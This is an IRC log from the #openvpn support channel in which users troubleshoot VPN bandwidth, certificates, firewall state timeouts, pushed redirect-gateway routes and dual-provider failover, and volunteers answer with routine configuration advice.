10:09 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 245 seconds]
10:10 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
10:22 -!- ade_b [Ade@redhat/adeb] has quit [Ping timeout: 240 seconds]
10:47 -!- AsadH is now known as zz_AsadH
10:48 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Ping timeout: 264 seconds]
10:48 -!- neilhwatson [~neilhwats@72.138.34.70] has joined #openvpn
10:57 -!- simpelsimon [~smalessa@91-66-249-214-dynip.superkabel.de] has quit [Quit: Leaving.]
11:04 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
11:07 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds]
11:07 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
11:10 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
11:10 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
11:10 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
11:10 -!- mode/#openvpn [+o krzee] by ChanServ
11:13 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in]
11:18 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn
11:20 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
11:34 -!- dazo is now known as dazo_afk
11:35 -!- kevinsky [~kevin@senna.rosendaal.net] has joined #openvpn
11:36 -!- JSharpe [~JSharpe@31.3.253.10] has joined #openvpn
11:40 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat]
12:00 -!- MeanderingCode [~Meanderin@71-213-164-137.albq.qwest.net] has joined #openvpn
12:03 -!- karlson [~nranchev@75.98.195.190] has joined #openvpn
12:05 < karlson> Hello
12:06 < karlson> I have to servers connected over openvpn but I am getting a really low bandwidth over vpn
12:06 < karlson> 10x what I am getting if the machines are communicating directly
12:08 < karlson> "two* servers"
12:08 < karlson> could anyone suggest things I could try?
12:09 < dioz> turn lzo off
12:09 < dioz> do it over udp not tcp
12:09 < dioz> use something like gre instead of openvpn
12:09 < rob0> I don't suppose either one is Windows, is it?
12:10 < karlson> udp is 10x slower tcp is 30x slower... :(
12:10 < karlson> nope
12:10 < karlson> both linux
12:10 < rob0> okay, ruled out my idea.
12:10 < karlson> I will try lzo off right now
12:11 <@krzee> !gigabit
12:11 <@vpnHelper> "gigabit" is https://community.openvpn.net/openvpn/wiki/Gigabit_Networks_Linux for JJK's writeup on getting the most out of openvpn over gigabit
12:11 < karlson> the openvpn processes on either server are not taking more than 10-15% of cpu
12:15 -!- amir [~amir@unaffiliated/amir] has joined #openvpn
12:15 < karlson> lzo changes had no effect :(
12:16 < karlson> (at least not significant)
12:16 -!- master_o1_master [~master_of@p4FF24C7A.dip.t-dialin.net] has joined #openvpn
12:19 -!- master_of_master [~master_of@p4FF24E6E.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
12:27 < karlson> increasing the mtus substantially seems to be helping a lot
12:39 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving]
12:41 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
12:41 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
12:43 < neilhwatson> Some ISPs throttle encrypted traffic.
12:43 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
12:43 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
12:43 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
12:43 -!- mode/#openvpn [+o krzee] by ChanServ
12:43 < karlson> neilhwatson: that's not the case in my situation
12:46 < karlson> should I expect to get the same bandwidth over openvpn as I do directly between the two servers?
12:47 < neilhwatson> There are some mtu settings including test and discovery.
12:47 < karlson> right now it's much better than it was with the default of mtu=1500 but still 3x slower than not using the vpn
12:47 < karlson> you mean mtu-test?
12:47 < karlson> I ran that but it didn't suggest any changes :(
12:48 <@krzee> mtu test may stop after testing below default
12:48 <@krzee> if your benefits are from bigger mtu, that'ld make sense
12:48 <@krzee> but im not 100% on how it works
12:56 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 264 seconds]
13:00 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn
13:01 < TommehM> Does anyone know how to combine certificates with the client.conf? I have seen it done before and attempted to replicate it but I just cant seem to get it right.
13:02 <@krzee> !inline
13:02 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs
13:02 < TommehM> Thanks.
13:02 <@krzee> yw
13:15 -!- chilicuil [~chilicuil@ubuntu/member/chilicuil] has joined #openvpn
13:15 -!- chilicuil [~chilicuil@ubuntu/member/chilicuil] has left #openvpn []
13:16 -!- NeWGame [irc2gowebc@84.126.149.110.dyn.user.ono.com] has joined #openvpn
13:16 < NeWGame> hi
13:21 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has joined #openvpn
13:26 < NeWGame> hi
13:46 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving]
13:47 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
13:59 -!- karlson [~nranchev@75.98.195.190] has left #openvpn []
14:03 -!- brute11k [~brute@89.249.230.53] has quit [Ping timeout: 244 seconds]
14:05 -!- UserUnk201302 [~UserUnk@wsip-68-109-228-234.ri.ri.cox.net] has joined #openvpn
14:07 < UserUnk201302> I am moving my vpn from one machine to another. Can I just copy the easy-rsa folder and will it work on the other machine?
14:07 -!- brute11k [~brute@89.249.235.13] has joined #openvpn
14:11 < rob0> You should keep your PKI on a different machine anyway. It should not be maintained on the server, and ideally, not even accessible online.
14:12 < UserUnk201302> so, if i keep it on my laptop, i can create keys and just copy to the server and clients?
14:17 -!- Devastator- [~devas@177.18.198.56] has joined #openvpn
14:17 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 252 seconds]
14:18 -!- Kovica [~kovica@77.38.49.83] has joined #openvpn
14:20 < Kovica> I have a very strange problem using openvpn. I have a server (openvpn v2.2.1 on Ubuntu 12.04) and I can connect to it and I can also access servers in my internal network. But sometimes it happens that I cannot access a server that I was able to 10 minutes ago.
14:20 < Kovica> It gets even stranger. In one terminal I have a ssh session opened to the server, but in another terminal I cannot ping it anymore.
14:21 < Kovica> On the server I'm running Ubuntu 11.10
14:21 <@krzee> ssh prolly didnt time out yet
14:21 < Kovica> how can I go about solving this mystery?
14:22 < Kovica> ohh.. on the VPN server I use iptables to restrict certain VPN client access to certain internal servers
14:23 < Kovica> when I run tcpdump on the VPN server and ping internal server from a VPN client, I see ICMP requests coming to VPN server, but no responses
14:24 < Kovica> from the internal server
14:26 < UserUnk201302> rob0, thanks
14:26 -!- UserUnk201302 [~UserUnk@wsip-68-109-228-234.ri.ri.cox.net] has quit [Quit: Leaving]
14:26 <@krzee> heh so you firewalled it off?
14:27 < Kovica> krzee, nope since I didn't change iptables in ages...
14:27 < Kovica> krzee, and this happened to me half an hour ago..
14:27 < Kovica> it's voodoo or something.. I don't know
14:27 <@krzee> dont look at it from a "what did i change" angle
14:28 <@krzee> look at it from a "what changed?" angle
14:28 <@krzee> figure out what changed, dont assume nothing did
14:28 <@krzee> cause obviously, something did
14:28 < Kovica> krzee, and one of my colleagues is saying to me now, that he can access the server..
14:29 <@krzee> then you prolly lost the connection, like i said at first
14:29 <@krzee> ssh prolly didnt time out yet
14:29 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
14:30 < Kovica> ssh prolly?
14:30 <@krzee> no, you got disconnected
14:31 <@krzee> you prolly cant ping the vpn server over the vpn when it happens either
14:31 <@krzee> did you go give a user your certificates instead of making new ones?
14:31 < Kovica> krzee, nope
14:31 < Kovica> krzee, every user has its own settings
14:32 <@krzee> certs != settings, but ok
14:32 < Kovica> and certs
14:32 < Kovica> and private keys
14:32 <@krzee> when it happens, start pinging the server over the vpn
14:32 <@krzee> i bet you arent on the vpn at all when it happens
14:33 < Kovica> I am, because at the time it happened I was on the VPN server running tcpdump and on my computer running ping to the internal server
14:33 < Kovica> btw: I can ping the internal server again
14:33 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has quit [Remote host closed the connection]
14:34 < Kovica> and I didn't even reconnect my VPN client
14:36 -!- Orbi [~opera@109.129.0.214] has joined #openvpn
14:37 -!- MeanderingCode [~Meanderin@71-213-164-137.albq.qwest.net] has quit [Remote host closed the connection]
14:45 < Kovica> strange
14:45 < Kovica> at least to me
14:47 <@krzee> its either a drop in your connection or a firewall
14:47 <@krzee> thats all i can tell ya
14:47 -!- voidnecron [~voidnecro@unaffiliated/necron] has quit []
14:47 <@krzee> and your vpn client likely reconnects itself
14:48 <@krzee> and if somehow your certs are in use 2x, then your clients will battle each other for the connection
14:48 < Kovica> krzee, ok. thanks. :) But would you agree that if I can connect to the server once, I will be able to connect the second time. So firewall cannot be, right?
14:49 < pekster> Some firewall rulesets do rate limiting in a weird enough way that could cause problems, so it really depends on the ruleset you're using
14:49 <@krzee> i know too little about your setup to tell you that
14:49 <@krzee> ya what he said ^
14:49 < pekster> Never under-estimate the ability of a badly configured firewall to screw things up ;)
14:49 < Kovica> :)
14:50 <@krzee> udp keep-state has caused problems for some in the past as well
14:50 < Kovica> I'm only doing this kind of administration for couple of months
14:51 < Kovica> we are using udp, yes
14:51 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has joined #openvpn
14:52 <@krzee> udp is good, udp keep-state attempts are not
14:52 -!- p3rror [~mezgani@41.249.14.4] has quit [Read error: Operation timed out]
14:52 < pekster> krzee: keep state suffix in ipf?
14:54 < pekster> Since udp is stateless, that should just show up as a new connection and be allowed to pass if the keepalives get dropped long enough to expire the "stateful" entry
14:55 < Kovica> by keep-state you mean something like: iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
14:55 <@krzee> so not enough keepalive, and not enough traffic = keep-state on non-stateful protocol fubars you
14:55 < pekster> In netfilter, yes. The Linux kernel times out even established UDP streams in 3 minutes (by default, although that's configurable)
14:57 -!- p3rror [~mezgani@41.249.35.188] has joined #openvpn
14:57 < pekster> krzee: Ah, ipf has a "keep state" suffix for rules, f.eg: pass in quick proto udp from any to $our_ip port = 1194 keep state
14:57 < pekster> Apparently you meant something else
14:58 <@krzee> ipf as in freebsd ipf?
14:58 <@krzee> i havnt seen that in years
14:58 <@krzee> like since the 90s
14:58 <@krzee> you really use ipf?
14:58 <@krzee> maybe you mean pf or ipfw? :D
15:03 < pekster> ipf. http://www.freebsd.org/cgi/man.cgi?query=ipf&sektion=5&apropos=0&manpath=FreeBSD+9.1-RELEASE
15:03 <@vpnHelper> Title: ipf(5) (at www.freebsd.org)
15:03 <@krzee> sweet!
15:03 <@krzee> keep it alive bro!
15:04 < pekster> That was on a box I inherited config for, so don't change what's working, especially when you see all the layers of NAT involved ;)
15:04 <@krzee> ipf is cool anyways
15:04 <@krzee> easier to change to pf as well
15:04 <@krzee> if it were ipfw it would likely be very different
15:04 <@krzee> ill bbl, just got off work
15:04 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 276 seconds]
15:05 <@krzee> time to go smoke my favorite plant and get ready to DJ at a bar tonight (for fun not work)
15:05 < pekster> Yea, macro support is nice in pf. Plus the BSD's had hfsc before it was cool enough for Linux ;)
15:06 < pekster> Somewhere there's a really good writeup on the benefits of hfsc under Linux's tc versus using sfq
15:07 -!- sh_t [~sht@176.222.238.158] has quit [Read error: No route to host]
15:07 < Kovica> http://linux-ip.net/articles/hfsc.en/ maybe ?
15:07 <@vpnHelper> Title: HFSC Scheduling with Linux (at linux-ip.net)
15:07 -!- sh_t [~sht@176.222.238.158] has joined #openvpn
15:08 -!- mattock is now known as mattock_afk
15:10 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds]
15:12 -!- MadTBone [~MadTBone@160.39.238.196] has joined #openvpn
15:12 -!- MadTBone [~MadTBone@160.39.238.196] has quit [Client Quit]
15:16 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
15:16 < pekster> Oh, it was comparing hfsc to tbf in terms of how they handle drops. The commented section is a pretty good writeup. The code might be a starting point, but it's not quite what I would use: https://gist.github.com/lsowen/4144606
15:16 <@vpnHelper> Title: HFSC - linux traffic shapings best kept secret (at gist.github.com)
15:17 < pekster> Either tbf or hfsc is easier and more sane to manage than CBQ, which is just needlessly complicated
15:29 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 248 seconds]
15:33 -!- mezgani_ [~mezgani@41.249.81.140] has joined #openvpn
15:34 -!- p3rror [~mezgani@41.249.35.188] has quit [Ping timeout: 245 seconds]
15:37 < Kovica> have fun guys.. Have to go to bed. Good night....
15:37 -!- Kovica [~kovica@77.38.49.83] has quit [Quit: Leaving]
15:52 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
15:52 -!- mode/#openvpn [+v s7r] by ChanServ
16:17 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
16:26 -!- JSharpe [~JSharpe@31.3.253.10] has quit [Quit: Leaving]
16:27 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Read error: Operation timed out]
16:28 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn
16:40 -!- unicorn_ [~unicorn@188.126.74.248] has joined #openvpn
16:40 < unicorn_> hi
16:40 < unicorn_> I have a problem with dns leaking when using openvpn
16:41 -!- unicorn_ is now known as randomA
16:41 < randomA> hey
16:41 <@ecrist> it's for horses
16:45 < randomA> how do i prevent my dns from leaking?
16:45 < randomA> someone said to use comodo's servers...should I do that?
16:45 < EugeneKay> Duct tape.
16:46 < randomA> ok...so i can't?
16:48 < randomA> as long as my own DNS doesn't show it's ok?
16:49 -!- randomA [~unicorn@188.126.74.248] has quit [Quit: Lost terminal]
16:49 < rob0> heh
16:49 < rob0> I was just thinking about trying to answer, saved by the /quit
16:53 -!- Orbi [~opera@109.129.0.214] has left #openvpn []
16:54 -!- mezgani_ [~mezgani@41.249.81.140] has quit [Read error: Operation timed out]
16:56 -!- Kendall [~gjones@173-165-28-227-Illinois.hfc.comcastbusiness.net] has joined #openvpn
16:58 -!- Kendall [~gjones@173-165-28-227-Illinois.hfc.comcastbusiness.net] has left #openvpn []
17:09 -!- mezgani_ [~mezgani@41.140.224.153] has joined #openvpn
17:12 -!- MeanderingCode [~Meanderin@71-213-164-137.albq.qwest.net] has joined #openvpn
17:14 -!- NeWGame [irc2gowebc@84.126.149.110.dyn.user.ono.com] has quit [Quit: irc2go]
17:15 -!- Kendall [~gjones@173-165-28-227-Illinois.hfc.comcastbusiness.net] has joined #openvpn
17:16 < Kendall> would there be any issue running both OpenVPN and IPSEC vpn on the same server? I wouldn't assume there is, but VPN isn't my forte
17:20 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 246 seconds]
17:30 < pppingme> Kendall there's no conflicting ports or protocols between OpenVPN and IPSEC, so careful planning of your IP structure and all should go well.
17:34 < Kendall> ok, thanks. One other question, are there downsides or limitations to how many connections you can make using a single certificate, when --duplicate-cn is enabled ?
17:36 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 248 seconds]
17:36 < pppingme> Kendall why would you want to do that? What happens if you have a laptop or something go rogue, then you have to kill EVERYONES certificate and re-issue instead of just revoking the one.
17:37 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
17:38 < pppingme> plus you have no idea who is actually connecting, you lose the ability to do ccd if you need to and a lot of other disadvantages
17:38 < Kendall> it would be a single certificate used to connect an Amazon Virtual Private Cloud. The guy setting it up is telling me that each EC2 instance would need its own openvpn cert, which since we're trying to accomplish auto scaling would be a huge PITA
17:39 < Kendall> so I thought maybe we could do one certificate just for EC2 VPC and use duplicate-cn
17:39 -!- mezgani_ [~mezgani@41.140.224.153] has quit [Quit: Leaving]
17:40 < Kendall> I would run a separate openVPN server so that only that one certificate is allowed to duplicate, none of the remote workers would have such capability
17:40 < pppingme> Kendall if the vpn is also used for general use, then I'd run two instances of openvpn, one for general use, and one for your amazon stuff, since, assuming, you have full control of the amazon stuff, not quite like a laptop that can grow legs.
17:41 -!- speed_racer8 [~speed_rac@98.196.168.201] has joined #openvpn
17:41 < pppingme> hah, same thought..
17:41 < Kendall> right, that's what I'm thinking. It's either that, or I configure and maintain an IPSEC gateway as well, which I have no experience with
17:41 < Kendall> and really is just one more thing to maintain
17:43 -!- kantlivelong [~kantlivel@47.23.189.90] has joined #openvpn
17:44 -!- p3rror [~mezgani@41.140.224.153] has joined #openvpn
17:44 < pppingme> a static ipsec setup is probably a tad more stable than an openvpn setup
17:47 < rob0> Shared certificates are pretty much always a bad idea. What little you gain on the initial setup will be more than lost in the future, count on it.
17:54 < Kendall> alright, I'll do some more research. Thanks guys, have a good night!
17:54 -!- Kendall [~gjones@173-165-28-227-Illinois.hfc.comcastbusiness.net] has quit [Quit: Leaving.]
17:58 < MeanderingCode> anyone here using ubuntu or variant?
17:59 < MeanderingCode> as of yesterday i can't connect to my openvpn provider, while others say they can, though i can ping the server:
17:59 < MeanderingCode> i'm getting tls handshake timeouts, and yesterday libgnutls26 was updated
17:59 < MeanderingCode> the timing of which makes me think that somehow that lib update has broken my openvpn client functionality
18:00 < MeanderingCode> but of course no one in #ubuntu who is active in the channel has anything to say
18:03 < pekster> MeanderingCode: OpenVPN uses openssl, not gnutls
18:03 < MeanderingCode> hmmm, someone else on the same repos got the same update and they can still connect
18:03 < MeanderingCode> pekster: oh, there's more buckshot in that theory
18:03 < MeanderingCode> any other leads?
18:04 < pekster> Sounds like your traffic simply isn't making it to the remote endpoint. If you tcpdump the port used, do you see any return traffic? (Hopefully you see the outbound traffic, otherwise your problem is more local)
18:04 < MeanderingCode> getting no ack, it seems, when trying to start the tls handshake
18:04 < pekster> Right, that's the usual symptom of "your data isn't getting to the peer"
18:05 < MeanderingCode> pekster: pings come back...i will try tcpdump and run it again
18:05 < pekster> A ping to your peer? That means it's reachable and routable, but that doesn't necessarily mean the UDP traffic (or tcp, if used with proto tcp-client) is making it there and back
18:14 < MeanderingCode> pekster: yeah, running the tcpdump on the router, itself, shows no responses from the server
18:14 < MeanderingCode> thx for the tip
18:15 < pekster> So you're left with the potential for your outbound data to never reach the server, or the server's reply never to reach you; tcpdump would show you return packets even if you firewalled them, so it's not your firewall (assuming you saw the outbound.)
18:16 < pekster> Could be an ISP or upstream filtering issue, or a problem with the reply somewhere
18:16 < pekster> You can try tracing that port with increasing TTL packets, starting with a TTL of 2 and see how far you get
18:17 < pekster> Compare that to a traceroute for your known-working ping
18:17 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
18:18 < MeanderingCode> pekster: thanks for the help...false alarm, it turns out: the server port i usually use isn't responding, but another port is
18:27 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds]
18:39 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit []
18:39 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has quit [Ping timeout: 252 seconds]
18:41 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 244 seconds]
18:43 -!- corretico [~luis@190.211.93.38] has joined #openvpn
18:44 < DougEFresh> hey
18:44 < DougEFresh> ecrist: you around
18:46 < DougEFresh> someone asked me why no centos 6 openvpn AS
18:46 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has joined #openvpn
18:47 -!- MeanderingCode_ [~Meanderin@71-213-164-137.albq.qwest.net] has joined #openvpn
18:47 -!- MeanderingCode [~Meanderin@71-213-164-137.albq.qwest.net] has quit [Ping timeout: 240 seconds]
19:05 -!- MeanderingCode [~Meanderin@71-213-172-90.albq.qwest.net] has joined #openvpn
19:05 -!- MeanderingCode_ [~Meanderin@71-213-164-137.albq.qwest.net] has quit [Ping timeout: 255 seconds]
19:21 -!- MeanderingCode [~Meanderin@71-213-172-90.albq.qwest.net] has quit [Remote host closed the connection]
19:28 -!- raidz is now known as raidz_away
19:32 -!- p3rror [~mezgani@41.140.224.153] has quit [Ping timeout: 245 seconds]
19:37 -!- Devastator- [~devas@177.18.198.56] has quit [Changing host]
19:37 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn
19:37 -!- Devastator- is now known as Devastator
19:55 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Changing host]
19:55 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has joined #openvpn
20:03 -!- C-S-B [~C-S-B@host81-157-117-86.range81-157.btcentralplus.com] has quit [Ping timeout: 248 seconds]
20:12 -!- Rassmasta [~Rassmasta@CPE0023bee4930d-CM0023bee4930a.cpe.net.cable.rogers.com] has joined #openvpn
20:12 < Rassmasta> !welcome
20:12 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
20:12 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
20:12 < Rassmasta> !howto
20:12 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
20:38 -!- Rassmasta [~Rassmasta@CPE0023bee4930d-CM0023bee4930a.cpe.net.cable.rogers.com] has quit [Quit: Leaving]
21:02 -!- C-S-B [~C-S-B@host86-171-238-234.range86-171.btcentralplus.com] has joined #openvpn
21:02 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn
21:05 -!- NeoLobster [~NeoLobste@snugglenets.com] has joined #openvpn
21:09 < NeoLobster> Hi. I have an OpenVPN client connection set up on a workstation that's behind NAT. I use port forwarding on the router for incoming connections (on port 80 and 22). When I start the OpenVPN connection, I'm no longer able to access the inbound ports from outside of my network. Is there a way to configure OpenVPN to ignore those connections?
21:11 < NeoLobster> It seems as though the connection is coming in from the real network interface, but the response is being sent out through the VPN
21:12 < pekster> If you're using/pushing --redirect-gateway this is the expected behaviour. The solution is to stop using it if you do not want it
21:14 < NeoLobster> Is that a server-side configuration? I'm not sure if that's what's going on here, I see nothing about redirect-gateway in the config I'm using
21:15 < pekster> Yup, that can be pushed from the server. It'll show up in the client logs as a 'PUSH_REPLY' log line
21:15 < NeoLobster> Oh, yeah... I see that.
21:15 < NeoLobster> Thu Feb 28 20:54:19 2013 PUSH: Received control message: 'PUSH_REPLY,dhcp-option DNS 8.8.8.8,redirect-gateway,route 10.10.0.1,topology net30,ping 20,ping-restart 240,ifconfig 10.10.0.170 10.10.0.169'
21:16 < NeoLobster> Now, the problem is.. I don't have access to the server-side configuration. It's a paid VPN service. I basically have two ports that need to be visible to the outside world on my machine, but all other traffic needs to go through the VPN. Is there a way I can configure that from the client side?
21:16 < pekster> You can make a server-side exception by way of a ccd (or client-connect script) and use of push-reset. Optionally the client use route-nopull which doesn't apply any pushed routes
21:33 < rob0> ewww, net30
21:33 < rob0> and no def1
21:34 -!- Rassmasta [~Rassmasta@99.228.239.126] has joined #openvpn
21:38 < pekster> If that's a hosted/provider setup, bad providers are VPNs are a dime a dozen. I give it 6 months before the content industry catches on and starts using the legal system to tear the worst offenders down in the
21:38 < pekster> in the "web anonymity" department
21:39 < pekster> I should do a write-up on how VPNs are not anonymous. Maybe I can get downvoted to no end on reddit with it :)
21:52 < EugeneKay> Ah, reddit.
21:52 < EugeneKay> Source of endless boobs.
22:25 -!- mongoman [~mongoman@200.46.98.147] has joined #openvpn
22:26 < mongoman> Hi, i have a problem using 2 openvpn client connections simultaneously.
22:27 < mongoman> Is there a white paper, or a common practice on achieving this?
22:27 < pekster> mongoman: Two unique clients connecting to the same server, or two unique connections both running on a single client?
22:28 < mongoman> the latter.
22:29 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has quit [Quit: Leaving]
22:29 < mongoman> I have a server that's supposed to act as a gateway for the other clients in the lan, the only way out of the lan is through that server. the server connects to 2 different vpn providers for redundancy.
22:30 < mongoman> The 2 connections are given a different metric and are set as the GW_Server
22:30 < mongoman> *The 2 connections are given a different metric and are set as the GW_Server's default route.
22:30 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection]
22:31 < mongoman> The problem I am having is sometimes I start getting about 50% packet loss, while both connections seem up
22:31 < mongoman> Each connection is working well by itself.
22:31 < pekster> What's the goal when you say you're using them both "for redundancy"?
22:32 < pekster> You want to use them both at the same time? Or for hot-failover?
22:32 < mongoman> In case one of the connections stops working (no more money in the vpn account, or they changed the server), i could route the internet traffic through the other connection
22:32 < mongoman> only as a hot-failover.
22:33 < pekster> Only use one as a default gateway then routed to the live VPN peer, and switch it over if it's disconnected or perhaps fails a connectivity check you perform (ping the VPN peer endpoint, ping some external series of "known good" hosts like google.com or such)
22:33 < pekster> route*
22:33 < pekster> The --up and --down scripts are probably of use here too
22:36 < mongoman> It's a good idea, however i still don't understand why i am getting the 50% packet loss
22:36 < mongoman> both connections work fine by themselves
22:36 < pekster> Probably because both routes end up getting used and you're getting results that take asymmetric paths
22:37 < mongoman> that might be the reason, however i have a different metric on both interfaces
22:37 < pekster> Don't use multiple gateways like that unless you're marking each traffic stream to keep it bound to the correct externally-facing interface
22:38 -!- NuclearMeltdown [~rep@AntiLiberal-1-pt.tunnel.tserv9.chi1.ipv6.he.net] has joined #openvpn
22:38 < pekster> The metric only matters if you're using an actual routing protocol daemon
22:38 -!- NuclearMeltdown [~rep@AntiLiberal-1-pt.tunnel.tserv9.chi1.ipv6.he.net] has quit [Changing host]
22:38 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has joined #openvpn
22:39 < mongoman> can you please elaborate on that?
22:39 < pekster> If you have not set up dynamic routing, then it's worthless, and the fact that you have multiple default gateways is causing the problem I described. Don't do that unless you're prepared to handle dynamic routing and the session-tracking that comes with it
22:40 < pekster> Keep session streams separated and route them separately if you want to use "both" connections at once, traditionally done under Linux by use of the connmark set/match support and keying off that in your routing setup (I like using tc and rule matches by cloning the nfmark from the connmark, but there are other ways too.)
22:41 < pekster> If that sounds complicated, it is an advanced routing topic; the good news is you don't really want it from a "hot-failover" perspective. Just use a single default gateway and you have no need for dynamic routing
22:41 -!- Rassmasta [~Rassmasta@99.228.239.126] has quit [Quit: Leaving]
22:43 < pekster> If you're looking to split the traffic between uplinks based on definable rules, LARTC has some good materials. http://lartc.org/howto/lartc.rpdb.multiple-links.html
22:43 <@vpnHelper> Title: Routing for multiple uplinks/providers (at lartc.org)
22:43 < mongoman> So if i understand correctly, if I have 2 same static routes and a metric which is different, linux doesn't consider the metric when routing the traffic?
22:43 < pekster> Start earlier in the LARTC guide if you're new to advanced routing concepts under Linux
22:45 < pekster> No, it doesn't do what you're expecting. http://osdir.com/ml/linux.network.routing/2002-11/msg00167.html
22:45 <@vpnHelper> Title: linux.network.routing - Re: does metric in route works? - msg#00167 - Recent Discussion OSDir.com (at osdir.com)
22:48 < mongoman> pekster, Thank you very much, I will look deeply into the info you gave me, thank you and have a good night.
22:49 < pekster> Sure thing. Based on your earlier stated goal of hot-failover, stop messing with multiple default gateways at once and just write some small scripts using the openvpn-provided --up and --down scripts, or design your own "detect if openvpn tunnel #1 is working" code to switch gateways if there's a problem
22:51 < mongoman> I will look into that, thanks.
23:00 -!- Rallias [~rallias@unaffiliated/gasseus] has joined #openvpn
23:01 < Rallias> Is it possible to have 2 tap VPN's share TAP0?
23:01 < pekster> Nope. If you really want the effect that would have, just bridge two unique tap adapters to a bridge
23:02 < pekster> You should use routing anyway unless you actually need to send Ethernet frames across your VPN
23:02 < pekster> !tunortap
23:02 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
23:02 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
23:02 < Rallias> problem with my setup... openvz doesn't support br0 in containers.
23:02 < pekster> Try a better virtualization solution?
23:02 < pekster> !openvz
23:02 <@vpnHelper> "openvz" is (#1) http://wiki.openvz.org/VPN_via_the_TUN/TAP_device to learn about openvz specific stuff with regards to openvpn or (#2) It is usually less painful to switch to a host with better virtualization technology, eg Xen.
23:03 < Rallias> I'm not particularly in the mood to switch 1500 VPS's from openvz to xen.
23:04 < EugeneKay> What could possibly go wrong
23:04 < Rallias> EugeneKay, We run out of memory?
23:05 < pekster> OpenVZ is "efficient" at the expensive of not being true virtualization. It's effectively a glorified chroot with some extra features bolted on
23:05 < pekster> expense*
23:06 < EugeneKay> RAM is cheap
23:07 < Rallias> EugeneKay, I've got 608 gb of ram distributed across 20 servers and no funds to do anything cool.
